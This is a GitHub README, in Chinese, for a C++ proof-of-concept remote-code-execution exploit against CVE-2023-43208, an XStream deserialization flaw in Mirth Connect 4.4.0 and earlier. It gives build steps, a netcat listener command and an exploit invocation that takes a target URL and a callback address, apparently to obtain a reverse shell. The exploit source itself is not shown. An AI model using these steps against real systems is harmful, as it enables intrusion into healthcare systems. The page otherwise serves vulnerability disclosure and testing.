Pegasus0xx/CVE-2023-43208
GitHub: Pegasus0xx/CVE-2023-43208
针对 Mirth Connect 4.4.0 及以下版本 XStream 反序列化漏洞的 C++ 语言 RCE 利用工具。
Stars: 1 | Forks: 0
# Mirth Connect RCE - CVE-2023-43208
## 描述
Mirth Connect 远程代码执行 (RCE) PoC
通过 XStream 反序列化影响 Mirth Connect <= 4.4.0。
## 环境要求
- g++ (C++20)
## 安装
```
git clone https://github.com/Pegasus0xx/CVE-2023-43208.git && \
cd CVE-2023-43208 && \
make
```
## 用法
```
./exploit
```
## 示例
### 启动监听器
```
nc -lvnp 4444
```
### 运行漏洞利用程序
```
./exploit https://target.com 10.10.10.10 4444
```
## 参考资料
- https://nvd.nist.gov/vuln/detail/CVE-2023-43208
- https://github.com/advisories/GHSA-pj5c-qr29-6746
标签:C++20, CISA项目, CVE-2023-43208, Maven, Mirth Connect, NextGen Connect, PoC, RCE, Web报告查看器, XStream 反序列化, 医疗信息系统, 攻击脚本, 暴力破解, 漏洞验证, 编程工具, 网络安全, 远程代码执行, 隐私保护